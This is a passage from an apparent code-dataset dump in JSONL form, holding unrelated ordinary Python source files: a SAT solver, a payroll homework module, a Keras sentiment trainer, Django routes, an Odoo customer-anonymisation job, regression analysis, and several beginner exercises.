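camera = get_default_mpr_camera(dim, spacing, orientation, center,
                                render_common.PositionType.TRANSVERSAL)
print(camera.GetPosition(), camera.GetViewUp())
print(get_slice_axis_matrix(camera))  # row-major 4x4 slice axes for the MPR reslice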
+{"seq_id":"438130645","text":"class Point:\n def __init__(self,x,y,color=\"\"):\n self.x =x\n self.y=y\n self.color=color\n\nclass Circle:\n def __init__(self, center, radius, color=''):\n self.center=center\n self.radius=checkValue(radius,\"radius\")\n self.color=color\n\nclass Rect:\n def __init__(self, center, width, height, color=''):\n self.center = center\n self.width = checkValue(width,\"width\")\n self.height =checkValue(height,\"height\")\n self.color=color\n\nclass Polygon:\n def __init__ (self, points, color=''):\n self.points=points\n self.color = color\n\ndef checkValue(val, attribute):\n if val>0:\n return val\n else:\n print(\"Error: \"+attribute +\" cannot be less than 0\")\n exit(1)\n","sub_path":"src/model/shape.py","file_name":"shape.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"387161054","text":"from copy import deepcopy\n# import pdb\n\n\ndef has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n return True\n return False\n\n\ndef has_empty(A):\n for sublist in A:\n if len(sublist) == 0:\n return True\n return False\n\n\ndef complement(atom):\n if atom[0] == '-':\n return atom[1]\n else:\n return '-' + atom\n\n\ndef is_negation(atom):\n if atom[0] == '-':\n return True\n else:\n return False\n\n\ndef unitPropagate(A, partial):\n # pdb.set_trace()\n while has_singleatom(A):\n for sublist in A:\n if len(sublist) == 1:\n pureatom = sublist[0]\n suppose(pureatom, A, partial)\n\n\ndef find_unassigned(wholelist, I):\n for sublist in wholelist:\n for atom in sublist:\n if is_negation(atom):\n check = complement(atom)\n else:\n check = atom\n if I.get(check, -1) == -1:\n return check\n\n\ndef suppose(pureatom, A, I):\n if (is_negation(pureatom)):\n assert I.get(complement(pureatom), -1) == -1, 'Acceding defined letter'\n I[complement(pureatom)] = 0\n else:\n assert I.get(pureatom, -1) == -1, 'Acceding defined letter'\n I[pureatom] = 1\n\n pureatom_complement = complement(pureatom)\n i = 0\n while i != len(A):\n sublist = A[i]\n if pureatom in sublist:\n A.pop(i)\n i = 0\n continue\n elif pureatom_complement in sublist:\n sublist.remove(pureatom_complement)\n i += 1\n\n\ndef DPLL(S, I):\n unitPropagate(S, I)\n if has_empty(S):\n return 'Insatisfacible', {}\n if len(S) == 0:\n return 'Satisfacible', I\n\n l = find_unassigned(S, I)\n S_prime = deepcopy(S)\n I_prime = deepcopy(I)\n suppose(l, S_prime, I_prime)\n maybe, S_prime_prime = DPLL(S_prime, I_prime)\n if maybe == 'Satisfacible':\n return 'Satisfacible', S_prime_prime\n else:\n S_prime2 = deepcopy(S)\n I_prime2 = deepcopy(I)\n suppose(complement(l), S_prime2, I_prime2)\n return DPLL(S_prime2, I_prime2)\n","sub_path":"DPLL.py","file_name":"DPLL.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"595263623","text":"# 有参无参,返回值\ndef show(name, age):\n print(\"My name is %s, I am %d years old\" % (name, age))\n\n\nshow(\"chen\", 28)\n\n\ndef return_value(name):\n return \"hello \" + name\n\n\nres = return_value(\"chen\")\nprint(res)\n\n\n# 缺省函数, 函数定义的时候参数就有值\ndef sum_name(a=1, b=2):\n return a + b\n\n\nprint(sum_name())\nprint(sum_name(3, 5))\nprint(sum_name(b=3, a=4)) # 关键字传参,不用注意顺序\n\n\n# 不定长参数, 是传入一个tuple, 不能使用关键字来指定\ndef sum_num(*args):\n print(args, type(args))\n\n r = 0\n for i in args:\n r += i\n return r\n\n\nrr = sum_num(1, 2, 3)\nprint(rr)\n\n\n# 不定长参数,传入一个dict, 必须使用关键字传参,指定kv\ndef sum_dict(**kwargs):\n print(kwargs, type(kwargs))\n\n for key, value in kwargs.items():\n print(key, value)\n\n\nsum_dict(a=1, b=2, c=3, name=\"tom\")","sub_path":"python_basic/day03/01-函数定义.py","file_name":"01-函数定义.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"41655513","text":"\"\"\"\ncs1114\n\nSubmission: rec08\n\nProgrammer: Yogesh Dhamija\nUsername: yad220\n\nThis module contains the Company type. \n\"\"\"\n\nfrom hw10_worker import *\n\nCOMPANY_DUPLICATE_WORKER_ERROR = 10001\nCOMPANY_NEGATIVE_HOURS_ERROR = 12345\nCOMPANY_TOO_LOW_WAGE_ERROR = 76547\nCOMPANY_TOO_HIGH_WAGE_ERROR = 67583\n\nCOMPANY_SUCCESS_CODE = 11111\n\nclass Company(object):\n\t\n\tdef __init__(self, name):\n\t\tself.__name = name\n\t\tself.__workers = {}\n\t\n\tdef addWorker(self, ssn, name):\n\t\t\"\"\" \"\"\"\n\t\tnewWorker = WorkerRec(ssn, name)\n\t\tif newWorker in self.__workers.keys():\n\t\t\treturn COMPANY_DUPLICATE_WORKER_ERROR\n\t\telse:\n\t\t\tself.__workers[newWorker.getSSN()] = newWorker\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef addWorkerHours(self, ssn, hours):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].addHours(hours)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_NEGATIVE_HOURS_ERROR):\n\t\t\treturn COMPANY_NEGATIVE_HOURS_ERROR\n\t\n\tdef changeWorkerRate(self, ssn, rate):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setRate(rate)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\telif(code == WORKER_TOO_LOW_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_LOW_WAGE_ERROR\n\t\telif(code == WORKER_TOO_HIGH_WAGE_ERROR):\n\t\t\treturn COMPANY_TOO_HIGH_WAGE_ERROR\n\t\n\tdef changeWorkerTitle(self, ssn, title):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].setTitle(title)\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef payAllWorkers(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = self.__payWorkersReturnList()\n\t\tpayList.sort()\n\t\twriteString = \"\"\n\t\tfor item in payList:\n\t\t\ttitleString = ' [%s]' % (item[3]) if item[3] != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(item[0], item[1], item[2], titleString)\n\t\tfilePath = \"%s.pay\" % (self.__name.strip())\n\t\thandle = open(filePath, 'w')\n\t\thandle.write(writeString)\n\t\thandle.close()\n\t\treturn COMPANY_SUCCESS_CODE\n\t\n\tdef __payWorkersReturnList(self):\n\t\t\"\"\" \"\"\"\n\t\tpayList = []\n\t\t# Structure of payList is [ [owed, SSN, name, title], [owed, SSN, name, title], ... ]\n\t\tfor item in self.__workers.values():\n\t\t\tcode = item.payWorker()\n\t\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\t\tpayList.append( [ item.getPay(), item.getSSN(), item.getName(), item.getTitle() ] )\n\t\treturn payList\n\t\n\tdef __makePrettyFormat(self, owed, ssn, name, title):\n\t\t\"\"\" \"\"\"\n\t\treturn (\"%i\\n%s $%0.2f%s\\n\") % (ssn, name, owed, title)\n\t\n\tdef fireWorker(self, ssn):\n\t\t\"\"\" \"\"\"\n\t\tcode = self.__workers[ssn].payWorker()\n\t\tif(code == WORKER_SUCCESS_CODE):\n\t\t\tfilePath = \"%s.FINAL.pay\" % (self.__workers[ssn].getName())\n\t\t\twriteString = \"\"\n\t\t\ttitleString = ' [%s]' % (self.__workers[ssn].getTitle()) if self.__workers[ssn].getTitle() != None else ''\n\t\t\twriteString = writeString + self.__makePrettyFormat(self.__workers[ssn].getPay(), ssn, self.__workers[ssn].getName(), titleString)\n\t\t\thandle = open(filePath, 'w')\n\t\t\thandle.write(writeString)\n\t\t\thandle.close()\n\t\t\tdel(self.__workers[ssn])\n\t\t\treturn COMPANY_SUCCESS_CODE\n","sub_path":"Homework/hw10/hw10_company.py","file_name":"hw10_company.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"612667101","text":"# python3\n# coding=\n\nfrom collections import Iterable\nimport warnings\nfrom time import sleep\nfrom tqdm import tqdm\nfrom .result import Result\nfrom .corpora import *\n\n\nfunctions = {\n 'rus': rus_corpus,\n 'bam': bam_corpus,\n 'emk': emk_corpus,\n 'zho': zho_corpus,\n 'rus_parallel': rus_parallel_corpus,\n 'dan': dan_corpus,\n 'est': est_corpus,\n 'kat': kat_corpus\n }\n\n\nclass Corpus:\n def __init__(self, language, sleep_time=1, sleep_each=5):\n \"\"\"\n language: str: language alias\n sleep_time: int: sleeping time in seconds\n sleep_each: int: sleep after each `sleep_each` request\n \"\"\"\n \n self.language = language\n self.__corpus = functions[self.language] \n self.doc = self.__corpus.__doc__\n \n self.results = list()\n self.failed = list()\n self.__retry_flag = False\n \n self.__warn = 'Nothing found for query \"%s\".\\n' \\\n 'Call `retry_failed` method to retry failed queries'\n self.__pbar_desc = '\"%s\"'\n self.__type_except = 'Argument `query` must be of type or iterable, got <%s>'\n\n if sleep_each < 1:\n raise ValueError('Argument `sleep_each` must be >= 1')\n \n self.sleep_each = sleep_each\n self.sleep_time = sleep_time\n\n def search(self, query, *args, **kwargs):\n \"\"\"\n query: str: query\n for arguments see `params_container.Container`\n \"\"\"\n \n if isinstance(query, str):\n query = [query]\n \n if not isinstance(query, Iterable):\n raise TypeError(self.__type_except % type(query))\n \n if args:\n progress_total = args[0]\n elif 'numResults' in kwargs:\n progress_total = kwargs['numResults']\n else:\n progress_total = 100\n \n _results = list()\n \n for q in query:\n self.parser = self.__corpus.PageParser(q, *args, **kwargs)\n _r = Result(self.language, self.parser.__dict__)\n q_desc = self.__pbar_desc % q\n \n for t in tqdm(self.parser.extract(),\n total=progress_total,\n unit='docs',\n desc=q_desc):\n _r.add(t)\n if _r.N % self.sleep_each == 0:\n sleep(self.sleep_time)\n \n _results.append(_r)\n if _r.N < 1:\n warnings.warn(self.__warn % q)\n if not self.__retry_flag:\n self.failed.append(_r)\n \n if not self.__retry_flag:\n self.results.extend(_results)\n \n return _results\n\n def retry_failed(self):\n \"\"\"\n Calls `.search()` for failed queries stored in `.failed`\n \n ISSUE:\n if `_r` got successfully retrieved here,\n its empty `Result` is still left in `Corpus.results` \n \"\"\"\n if self.failed:\n self.__retry_flag = True\n _pos = list()\n _neg = list()\n \n for r in self.failed:\n _r = self.search(r.query, **r.params)[0]\n if _r.N > 0:\n _pos.append(_r)\n else:\n _neg.append(_r)\n \n self.failed = _neg[:]\n self.results.extend(_pos)\n self.__retry_flag = False\n \n return _pos\n \n else:\n return []\n","sub_path":"lingcorpora/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":3624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"450282899","text":"import argparse\nimport os\n\nimport numpy as np\nimport tensorflow as tf\nimport data_helper\nfrom random import shuffle\n\nfrom keras import backend as K\nfrom keras import models\nfrom keras import layers\nfrom keras import optimizers\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser()\n args.add_argument('--strmaxlen', type=int, default=150)\n args.add_argument('--epochs', type=int, default=100)\n args.add_argument('--batch', type=int, default=10)\n args.add_argument('--embedding', type=int, default=256)\n args.add_argument('--featuresize', type=int, default=129) # ascii code 기준 0~127 + 1\n config = args.parse_args()\n\n inputs = layers.Input((config.strmaxlen,)) \n layer = layers.Embedding(config.featuresize, config.embedding, input_length=config.strmaxlen, mask_zero = True)(inputs)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=True))(layer)\n layer = layers.Bidirectional(layers.GRU(128, return_sequences=False))(layer)\n\n layer_dense = layers.Dense(3)(layer)\n outputs_softmax = layers.Activation('softmax')(layer_dense)\n\n model = models.Model(inputs=inputs, outputs=outputs_softmax)\n model.summary()\n model.compile(optimizer=optimizers.Adam(lr=0.001,amsgrad=True), loss='binary_crossentropy', metrics=['accuracy'])\n \n file_train_instances = \"sample50.csv\" #데이터셋 파일 이름\n \n # Load data\n print(\"Loading data...\") \n sentences, sentimentlabels = data_helper.load_data_and_labels(file_train_instances,config.strmaxlen)\n \n dataset_len = len(sentences)\n one_batch_size = dataset_len//config.batch\n if dataset_len % config.batch != 0:\n one_batch_size += 1\n \n sentiment_dataset = list(zip(sentences,sentimentlabels))\n print(sentiment_dataset)\n \n # epoch마다 학습을 수행합니다.\n for epoch in range(config.epochs):\n avg_loss = 0.0\n avg_acc = 0.0\n \n shuffle(sentiment_dataset)\n for batch in enumerate(data_helper._batch_loader(sentiment_dataset, config.batch)):\n i = batch[0] # enumerate - index\n data, labels = zip(*batch[1]) #batch[1] = (data,labels) -> 이걸 data, labels로 분리한다.\n data = np.array(data) # numpy array화\n labels = np.array(labels) # numpy array화\n loss, acc = model.train_on_batch(data, labels)\n print('Batch : ', i + 1, '/', one_batch_size,\n ', loss in this minibatch: ', float(loss),\n ', acc in this minibatch: ', float(acc))\n avg_loss += float(loss)\n avg_acc += float(acc)\n \n print('epoch:', epoch, ' train_loss:', float(avg_loss/one_batch_size), ' train_acc:', float(avg_acc/one_batch_size)) \n filename = str(\"model-epoch \"+ str(epoch))\n model.save(filename)","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"242057634","text":"import item\nimport date\nimport unittest\n\n#class TestSequenceFunctions(unittest.TestCase):\n\n#def setUp():\n\ndef test_chocoladeshot(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchocoshot = item.Chocoladeshot(today,tempdate,1)\n\t\tself.assertEqual(chocoshot.getColor(),\"wit\")\n\t\tchocoshot.setColor(2)\n\t\tself.assertEqual(chocoshot.getColor(),\"bruin\")\n\t\tself.assertEqual(chocoshot.getPrice(),1)\n\ndef test_honing(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\thoning = item.Honing(today,tempdate)\n\t\tself.assertEqual(honing.getPrice(),0.50)\n\ndef test_Marshmallow(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tmarshmallow = item.Marshmallow(today,tempdate)\n\t\tself.assertEqual(marshmallow.getPrice(),0.75)\n\ndef test_Chilipeper(self):\n\t\ttoday = date.Date(1,1,1,1,1,2013)\n\t\ttempdate = date.Date(10,1,3,1,5,2014)\n\t\tchilipeper = item.Chilipeper(today,tempdate)\n\t\tself.assertEqual(chilipeper.getPrice(),0.25)\n\n\t\ndef test(self):\t\n\tprint()\n\tprint(\"starting testing testItem\")\n\ttest_chocoladeshot(self)\n\ttest_honing(self)\n\ttest_Marshmallow(self)\n\ttest_Chilipeper(self)\n\tprint(\"finished testing testItem\")\n\t\n \n\nif __name__ == '__main__':\n\tunittest.main()\n","sub_path":"Project/testItem.py","file_name":"testItem.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"361753016","text":"# _*_ coding:utf-8 _*_\n_author_ = 'jackson'\n_date_ = '2019/4/7 16:50'\n\n\nfrom django.conf.urls import url,include\nfrom .views import MoocsListView,MoocDetailView,AddFavView\n\nurlpatterns = [\n #慕课小组列表页\n url(r'^list/$', MoocsListView.as_view(), name=\"mooc_list\"),\n\n #慕课小组详情页\n url(r'^detail/(?P\\d+)/$', MoocDetailView.as_view(), name=\"mooc_detail\"),\n # url(r'^detail/$', MoocDetailView.as_view(), name=\"moocs_detail\"),\n\n #慕课收藏\n url(r'^add_fav/$',AddFavView.as_view(),name=\"add_fav\")\n\n]","sub_path":"apps/moocs/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"626692394","text":"import os\n\nimport cv2\nimport numpy as np\n\npath = os.getcwd() + os.sep\n# path += '../db_aulas/Imagens/obama.jpeg'\npath += '../db_images/jpeg/captcha.jpeg'\n# path += '../db_images/png/captcha.png'\n\nimg = cv2.imread(path)\ngray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\ndetector = cv2.FastFeatureDetector_create()\nkps = detector.detect(gray, None)\n\nimg2 = cv2.drawKeypoints(img, kps, None, color=(255,0,0))\n\ncv2.imshow(\"image\", np.hstack([img, img2]))\ncv2.waitKey(0)\n","sub_path":"aulas/vision/aula_11/fast_detecter_pontos.py","file_name":"fast_detecter_pontos.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"419078265","text":"# -*- coding: utf-8 -*-pack\n# Part of Odoo. See LICENSE file for full copyright and licensing details.\n\nfrom odoo import api, models, fields\nfrom odoo.addons.iap.tools import iap_tools\nfrom ..endpoint import DEFAULT_ENDPOINT\n\n\nclass ResPartner(models.Model):\n \"\"\"\n Inherited for VAT configuration in partner of Warehouse.\n \"\"\"\n _inherit = \"res.partner\"\n\n is_amz_customer = fields.Boolean(\"Is Amazon Customer?\")\n\n @api.model\n def _search(self, args, offset=0, limit=None, order=None, count=False, access_rights_uid=None):\n if not self.env.context.get('is_amazon_partner', False):\n args = [('is_amz_customer', '=', False)] + list(args)\n return super(ResPartner, self)._search(args, offset, limit, order, count, access_rights_uid)\n\n @api.onchange(\"country_id\")\n def _onchange_country_id(self):\n \"\"\"\n Inherited for updating the VAT number of the partner as per the VAT configuration.\n @author: Maulik Barad on Date 13-Jan-2020.\n \"\"\"\n if self.country_id:\n warehouse_ids = self.env[\"stock.warehouse\"].search_read(\\\n [(\"partner_id\", \"=\", self._origin.id)],\n [\"id\", \"company_id\"])\n if warehouse_ids:\n vat_config = self.env[\"vat.config.ept\"].search(\\\n [(\"company_id\", \"=\", warehouse_ids[0].get(\"company_id\")[0])])\n vat_config_line = vat_config.vat_config_line_ids.filtered(\\\n lambda x: x.country_id == self.country_id)\n if vat_config_line:\n self.write({\"vat\": vat_config_line.vat})\n return super(ResPartner, self)._onchange_country_id()\n\n @api.model\n def create(self, vals):\n if vals.get('is_amz_customer'):\n vals.update({'allow_search_fiscal_based_on_origin_warehouse': True})\n return super(ResPartner, self).create(vals)\n\n def auto_delete_customer_pii_details(self):\n \"\"\"\n Auto Archive Customer's PII Details after 30 days of Import as per Amazon MWS Policies.\n :return:\n \"\"\"\n if not self.env['amazon.seller.ept'].search([]):\n return True\n account = self.env['iap.account'].search([('service_name', '=', 'amazon_ept')])\n dbuuid = self.env['ir.config_parameter'].sudo().get_param('database.uuid')\n kwargs = {\n 'app_name': 'amazon_ept',\n 'account_token': account.account_token,\n 'dbuuid': dbuuid,\n 'updated_records': 'Scheduler for delete PII data has been started.'\n }\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n query = \"\"\"update res_partner set name='Amazon',commercial_company_name='Amazon', \n display_name='Amazon', \n street=NULL,street2=NULL,email=NULL,city=NULL,state_id=NULL,country_id=NULL,\n zip=Null,phone=NULL,mobile=NULL\n from\n (select r1.id as partner_id,r2.id as partner_invoice_id,r3.id as \n partner_shipping_id from sale_order\n inner join res_partner r1 on r1.id=sale_order.partner_id\n inner join res_partner r2 on r2.id=sale_order.partner_invoice_id\n inner join res_partner r3 on r3.id=sale_order.partner_shipping_id\n where amz_instance_id is not null and sale_order.create_date<=current_date-30)T\n where res_partner.id in \n (T.partner_id,T.partner_invoice_id,T.partner_shipping_id)\n \"\"\"\n self.env.cr.execute(query)\n\n if self.env.cr.rowcount:\n kwargs.update({'updated_records': 'Archived %d customers' % self.env.cr.rowcount})\n iap_tools.iap_jsonrpc(DEFAULT_ENDPOINT + '/delete_pii', params=kwargs, timeout=1000)\n return True\n","sub_path":"amazon_ept/models/res_partner.py","file_name":"res_partner.py","file_ext":"py","file_size_in_byte":3881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"402098672","text":"import os\nimport collections\nimport json\n\n\ndef update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n d[k] = update(d.get(k, {}), v)\n else:\n d[k] = v\n return d\n\n\ndef update_from_path(d, u, path):\n if len(path) == 1:\n d[path[0]] = u[path[0]]\n return d\n d[path[0]] = update_from_path(d.get(path[0], {}), u[path[0]], path[1:])\n return d\n\n\ndef update_config_from_state(c, logger):\n if 'state' not in c or 'file' not in c['state']:\n raise ValueError('No state listed in config')\n if os.path.exists(c[\"state\"][\"file\"]):\n with open(c[\"state\"][\"file\"], \"r\") as f:\n state = json.load(f)\n c = update(c, state)\n else:\n logger.info(\"State storage file doesn't exist, initializing with empty state!\")\n return c\n\n\ndef update_state(config, logger):\n if 'state' not in config or 'file' not in config['state']:\n raise ValueError('No state listed in config')\n if len(config[\"state\"][\"file\"]) < 1:\n logger.info(\"State storage disabled in config (state file empty)! Skipping update..\")\n return\n state = {}\n for field_path in config[\"state\"][\"fields\"]:\n field_path_list = field_path.split(\":\")\n update_from_path(state, config, field_path_list)\n try:\n with open(config[\"state\"][\"file\"], \"w\") as f:\n json.dump(state, f, indent=2)\n except Exception as e:\n logger.warning(\"Failed to save state file, because: {}\".format(str(e)))\n","sub_path":"utils/src/python/ConfigUtils.py","file_name":"ConfigUtils.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"273374653","text":"#! /usr/bin/python2\n\nfrom jinja2 import Template, Environment, FileSystemLoader\nfrom os import listdir\n\nmanglers = {\n '.hs': \"Hs\",\n '.py': \"Py\",\n '.ou': \"Out\",\n}\n\ndef mangle(xs):\n def _mangle(xs, ms):\n if not ms:\n return xs\n m = ms.pop()\n return _mangle(xs.replace(*m), ms)\n return _mangle(xs, manglers.items())\n\nbpath = \"./examples/\"\nxs = listdir(bpath)\nxs = [x for x in xs if x[-3:] in manglers.keys()]\nxs = [(mangle(x), open(bpath + x).read().strip()) for x in xs]\n\nopen(\"./index.html\", \"w\").write(\n Environment(loader = FileSystemLoader('./')).\\\n get_template(\"./index.html.jinja\").\\\n render(**dict(xs)).\\\n encode(\"utf-8\")\n)\n","sub_path":"make.py","file_name":"make.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"117180179","text":"\"\"\"Variable selection using ridge regression\"\"\"\nimport pickle\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import mean_absolute_error\n\nfrom bld.project_paths import project_paths_join as ppj\nfrom src.model_code.polynomialregression import PolynomialRegression\nfrom src.model_code.ridgeregression import RidgeRegression\nfrom src.utilities.utilities import load_testing_data\nfrom src.utilities.utilities import load_training_data\n\n\ndef is_interaction(coef_name):\n return \":\" in coef_name\n\n\ndef is_squared(coef_name):\n return coef_name.endswith(\"^2\")\n\n\nif __name__ == \"__main__\":\n # data used for ridge regression (low sample size to induce regularization)\n Xridge, yridge = load_training_data(nobs=200)\n # data used for polynomial model fitting on subset of variables\n Xpol, ypol = load_training_data(nobs=5000)\n # data used to estimate the mean absolute error on test set\n Xtest, ytest = load_testing_data(nobs=5000)\n\n rr = RidgeRegression()\n pr = PolynomialRegression()\n\n # ridge regression, variable regularization\n rr = rr.fit(Xridge, yridge, degree=1)\n\n coef = rr.coefficients.values.reshape(-1)\n\n thresholds = np.linspace(0, 0.05, num=500)\n\n # find parameters which are zero given a threshold\n is_zero = []\n for thresh in thresholds:\n zero = np.where(np.abs(coef) < thresh)[0]\n is_zero.append(zero)\n\n # extract parameter names\n is_zero_named = [rr.coefficients.index[index].to_list() for index in is_zero]\n\n is_zero_squared = [[e for e in x if is_squared(e)] for x in is_zero_named]\n is_zero_interaction = [[e for e in x if is_interaction(e)] for x in is_zero_named]\n is_zero_linear = [\n [e for e in x if not is_interaction(e) and not is_squared(e)]\n for x in is_zero_named\n ]\n\n # compute test mae using polynomial model and store in data frame\n mae = []\n for drop in is_zero_named:\n XX = Xpol.drop(drop, axis=1)\n XXtest = Xtest.drop(drop, axis=1)\n pr = pr.fit(XX, ypol, degree=2, fit_intercept=True)\n ypred = pr.predict(XXtest)\n mae.append(mean_absolute_error(ytest, ypred))\n\n df = pd.DataFrame(zip(mae, thresholds), columns=[\"mae\", \"thresholds\"])\n\n # compute when the set of variables that are set to zero changes\n changes = []\n change_index = []\n for i in range(len(is_zero_linear) - 1):\n e = set(is_zero_linear[i])\n ee = set(is_zero_linear[i + 1])\n if e != ee:\n change_index.append(i + 1)\n changes.append(list(ee - e)[0])\n\n # save data\n data = {\n \"df\": df,\n \"change_index\": change_index,\n \"changes\": changes,\n \"thresholds\": thresholds,\n }\n with open(ppj(\"OUT_ANALYSIS\", \"variable_selection.pkl\"), \"wb\") as handle:\n pickle.dump(data, handle, protocol=pickle.HIGHEST_PROTOCOL)\n","sub_path":"src/analysis/variable_selection.py","file_name":"variable_selection.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"230195922","text":"import numpy as np\nimport random\nimport os\n\ncls=\"\\n\"*100\nprint(\"------------- Soma de Matrizes -------------\")\nwhile True:\n\tprint(\"Matriz A\")\n\tmA = int(input(\"Numero de linhas: \"))\n\tnA = int(input(\"Numero de colunas: \"))\n\tx=mA*nA\n\tmatA = np.arange(x).reshape(mA,nA)\n\n\tprint()\n\t\n\tprint(\"Matriz B\")\n\tmB = int(input(\"Numero de linhas: \"))\n\tnB = int(input(\"Numero de colunas: \"))\n\tx=mB*nB\n\tmatB = np.arange(x).reshape(mB,nB)\n\n\tif (mA!=mB) or (nA!=nB):\n\t\tos.system('cls' if os.name == 'nt' else 'clear')\n\t\tprint(\"Impossivel realizar a soma, numero de linhas ou de colunas diferentes entre as matrizes A e B\")\n\telse:\n\t\tbreak\n\nmatC = np.arange(x).reshape(mB,nB)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatA[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatB[i][j] = random.randint(0,9)\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tmatC[i][j] = matA[i][j] + matB[i][j]\nprint()\n\nespaco = ' '*nA\n\nprint(\"Matriz A\",espaco, end='\t\t')\nprint(\"Matriz B\",espaco, end='\t\t')\nprint(\"Matriz C\")\n\nfor i in range(mA):\n\tfor j in range(nA):\n\t\tprint(matA[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matB[i][j], end=\" \")\n\tprint(\"\t\t\t\", end='')\n\tfor j in range(nA):\n\t\tprint(matC[i][j], end=\" \")\n\tprint()\n","sub_path":"1e.py","file_name":"1e.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"52571614","text":"# protest.py\n# by aaron montoya-moraga\n# march 2017\n\n# to distribute, on terminal do\n# python setup.py sdist\n\n# from distutils.core import setup\n\nfrom setuptools import *\nfrom codecs import open\nfrom os import path\n\n\n# taken from https://tom-christie.github.io/articles/pypi/\nhere = path.abspath(path.dirname(__file__))\n\n# taken from https://tom-christie.github.io/articles/pypi/\nwith open(path.join(here, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\n\nsetup(\n name='protest',\n version='0.5.11',\n url='https://github.com/montoyamoraga/protestpy',\n author='aaron montoya-moraga',\n description='automatic generation of protesting material',\n long_description=long_description,\n license='MIT',\n packages= find_packages(exclude=['contrib', 'docs', 'tests*']),\n install_requires=['Pillow', 'videogrep', 'selenium<3.0.0', 'youtube_dl', 'chromedriver'],\n package_data={'protest': ['*.ttf']}\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"579312729","text":"import Globals\r\nimport wx\r\nimport PlatformMethods\r\n\r\nclass DirectoryTreeView:\r\n def __init__(self, parentWin, treeDirList):\r\n self.parentWindow = parentWin\r\n self.treeDirList = treeDirList\r\n # Create an image list\r\n dirIL = wx.ImageList(16,16, True)\r\n \r\n # Get some standard images from the art provider and add them\r\n # to the image list\r\n self.fldridx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FOLDER, \r\n wx.ART_OTHER, (16,16)))\r\n \r\n self.fldropenidx = dirIL.Add(\r\n wx.ArtProvider.GetBitmap(wx.ART_FILE_OPEN, \r\n wx.ART_OTHER, (16,16)))\r\n #Give the tree the image list\r\n self.treeDirList.AssignImageList(dirIL)\r\n #self.SetTreeButtons()\r\n self.UpdateDirectoryList()\r\n \r\n \r\n def UpdateDirectoryList(self):\r\n if len(Globals.DirectoryList) == 0:\r\n dirSet = set()\r\n for file in Globals.FileInfoList:\r\n dirSet.add(file.DirectoryPath)\r\n Globals.DirectoryList = list(dirSet)\r\n \r\n \r\n def SetTreeButtons(self):\r\n\r\n bitmap_plus = 